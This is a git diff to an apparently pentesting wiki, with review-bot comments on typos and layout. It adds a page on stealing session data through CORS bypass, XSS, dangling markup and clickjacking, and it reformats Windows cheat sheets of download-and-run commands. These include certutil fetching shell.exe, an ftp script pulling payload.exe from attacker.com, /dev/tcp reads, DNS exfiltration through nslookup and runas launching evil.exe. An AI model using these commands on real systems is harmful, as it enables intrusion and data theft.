diff --git a/SUMMARY.md b/SUMMARY.md index 788ef5c14..38e3bf27a 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -417,4 +417,5 @@ * [Online Platforms with API](online-platforms-with-api.md) * [Phising Documents](phising-documents.md) * [Reset Password Bypass](reset-password.md) +* [Stealing Sensitive Information Disclosure from a Web](stealing-sensitive-information-disclosure-from-a-web.md) diff --git a/pentesting/pentesting-smb.md b/pentesting/pentesting-smb.md index 89b65ad6f..cfa2a9118 100644 --- a/pentesting/pentesting-smb.md +++ b/pentesting/pentesting-smb.md @@ -264,7 +264,9 @@ smbclient /// > mget * #Download everything to current directory ``` + Commands: + * mask: specifies the mask which is used to filter the files within the directory \(e.g. "" for all files\) * resurse: toggles recursion on \(default: off\) * prompt: toggles prompting for filesnames off \(default: on\) diff --git a/stealing-sensitive-information-disclosure-from-a-web.md b/stealing-sensitive-information-disclosure-from-a-web.md new file mode 100644 index 000000000..b596eb99f --- /dev/null +++ b/stealing-sensitive-information-disclosure-from-a-web.md 
@@ -0,0 +1,10 @@ +# Stealing Sensitive Information Disclosure from a Web + +If at some point you find a **web page that presents you sensitive information based on your session**: Maybe it's reflecting cookies, or printing or CC details or any other sensitive information, you may try to steal it. +Here I present you the main ways to can try to achieve it: + +* [**CORS bypass**](pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page. +* \*\*\*\*[**XSS**](pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information. +* \*\*\*\*[**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection.md): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags. +* [**Clickjaking**](pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data \(an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)\). + diff --git a/windows/basic-cmd-for-pentesters.md b/windows/basic-cmd-for-pentesters.md index 4a2c2dc56..c03dc0928 100644 --- a/windows/basic-cmd-for-pentesters.md +++ b/windows/basic-cmd-for-pentesters.md 
@@ -252,111 +252,133 @@ arp -A ## Download Bitsadmin.exe + ```text bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 ``` CertReq.exe + ```text CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt ``` Certutil.exe + ```text certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe ``` Desktopimgdownldr.exe + ```text set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr ``` Diantz.exe + ```text diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab ``` Esentutl.exe + ```text esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o ``` Expand.exe + ```text expand \\webdav\folder\file.bat c:\ADS\file.bat ``` Extrac32.exe + ```text extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt ``` Findstr.exe + ```text findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe ``` Ftp.exe + ```text cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" ``` GfxDownloadWrapper.exe + ```text C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE" ``` Hh.exe + ```text HH.exe http://some.url/script.ps1 ``` Ieexec.exe + ```text ieexec.exe http://x.x.x.x:8080/bypass.exe ``` Makecab.exe + ```text makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab ``` MpCmdRun.exe + ```text MpCmdRun.exe -DownloadFile -url -path //Windows Defender executable ``` Replace.exe + ```text replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A ``` Excel.exe + ```text Excel.exe http://192.168.1.10/TeamsAddinLoader.dll ``` Powerpnt.exe + ```text Powerpnt.exe 
"http://192.168.1.10/TeamsAddinLoader.dll" ``` Squirrel.exe + ```text squirrel.exe --download [url to package] ``` Update.exe + ```text Update.exe --download [url to package] ``` Winword.exe + ```text winword.exe "http://192.168.1.10/TeamsAddinLoader.dll" ``` Wsl.exe + ```text wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary' ``` @@ -373,7 +395,7 @@ time #Get current time date #Get current date shutdown /r /t 0 #Shutdown now type #Cat file - + #Runas runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials runas /netonly /user\ "cmd.exe" ::The password will be prompted @@ -411,12 +433,12 @@ netsh http show urlacl ```bash sudo responder -I #Active -sudo tcpdump -i -A proto udp and dst port 53 and dst ip #Passive +sudo tcpdump -i -A proto udp and dst port 53 and dst ip #Passive ``` #### Victim -_**for /f tokens**_ ****technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server +_**for /f tokens**_ _\*\*_technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server ```text for /f %a in ('whoami') do nslookup %a #Get whoami diff --git a/windows/basic-powershell-for-pentesters/README.md b/windows/basic-powershell-for-pentesters/README.md index 6ad0c1011..68d120f27 100644 --- a/windows/basic-powershell-for-pentesters/README.md +++ b/windows/basic-powershell-for-pentesters/README.md 
@@ -40,21 +40,25 @@ powershell -nop -enc ## Download ### System.Net.WebClient + ```text (New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe") ``` ### Invoke-WebRequest + ```text Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe" ``` ### Wget + ```text wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe" ``` ### BitsTransfer + ```text Import-Module BitsTransfer Start-BitsTransfer -Source $url -Destination $output
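Review bot: the new SUMMARY.md entry `* [Stealing Sensitive Information Disclosure from a Web](stealing-sensitive-information-disclosure-from-a-web.md)` places the page at the repository root, yet every link inside that page points into `pentesting-web/` (`pentesting-web/cors-bypass.md`, `pentesting-web/xss-cross-site-scripting/`, `pentesting-web/dangling-markup-html-scriptless-injection.md`, `pentesting-web/clickjacking.md`); consider filing the new page under `pentesting-web/` next to the pages it summarises and pointing this entry there, so the book's directory layout and table of contents stay aligned.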
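Review bot: two typos in the command list added to pentesting/pentesting-smb.md: `* resurse: toggles recursion on \(default: off\)` should read `recurse`, and `toggles prompting for filesnames off` should read `filenames`. The `mask` item reads `e.g. "" for all files` with nothing between the quotes, so the wildcard example has been lost; write the intended pattern out explicitly. It would also help to say that these are interactive smbclient commands typed at its prompt (the list sits right under the `smbclient /// > mget *` example), otherwise readers may try them as shell commands.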
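Review bot: the new file stealing-sensitive-information-disclosure-from-a-web.md has wording and markup problems in nearly every line: `Danging Markup` should be `Dangling Markup`, `Clickjaking` should be `Clickjacking`, `the main ways to can try to achieve it` should be `the main ways you can try to achieve it`, and `or printing or CC details` reads like a leftover edit. The `\*\*\*\*` escapes in front of the XSS and Dangling Markup bullets render as literal asterisks; delete them instead of escaping them. In the CORS bullet, `performing Ajax request for a malicious page` should read `from a malicious page`, since the point is where the request originates.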
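Review bot: in the `## Download` hunk of windows/basic-cmd-for-pentesters.md, the tool names (`Bitsadmin.exe`, `CertReq.exe`, `Certutil.exe` and the rest) are plain paragraph lines, so they cannot be linked from the table of contents and are easy to mistake for command text; the PowerShell README in this same patch uses `### System.Net.WebClient`-style headings for the equivalent sections, and the same `###` headings would be consistent here. The `MpCmdRun.exe -DownloadFile -url -path //Windows Defender executable` line has lost the values for `-url` and `-path`, and the `GfxDownloadWrapper.exe` path mixes a regex fragment (`[0-9]+`) into a literal path without saying so; put explicit placeholders back and mark them as such so the examples are not pasted as-is.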
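Review bot: the `#Runas` label added to this block mixes comment styles: the surrounding lines use `#` for trailing annotations while `::The password will be prompted` uses cmd's `::` syntax, and `#` is not a comment character in cmd.exe, so a line pasted together with its annotation fails. Pick one convention and state it once at the top of the file. Also, `runas /netonly /user\ "cmd.exe"` appears to have lost the value of its `/user` argument, so the line cannot run as written; add an explicit placeholder.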
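Review bot: the `-`/`+` pair for `sudo tcpdump -i -A proto udp and dst port 53 and dst ip #Passive` is visually identical, so this looks like a whitespace-only change; worth confirming it is intended. Both versions are missing the interface after `-i` and the address after `dst ip`, and `dst ip` is not a valid BPF primitive: the destination-address qualifier is `dst host <ip>`. In the `for /f tokens` line, replacing `****technique` with `_\*\*_technique` still renders stray characters (an empty emphasis and literal asterisks); deleting the markers entirely gives `_**for /f tokens**_ technique`, which is what the sentence intends.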
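Review bot: the `### Wget` section in windows/basic-powershell-for-pentesters/README.md duplicates `### Invoke-WebRequest`: in Windows PowerShell `wget` is a built-in alias for `Invoke-WebRequest`, and the `-OutFile` parameter used here belongs to that cmdlet, so say so rather than presenting it as a separate tool (the alias does not exist in PowerShell on Linux or macOS, where `wget` is the GNU binary). The `### BitsTransfer` block uses `$url` and `$output` without defining them; assign them in the block so it is complete. All four fences are tagged `text`; tagging them `powershell` gives syntax highlighting with no other change.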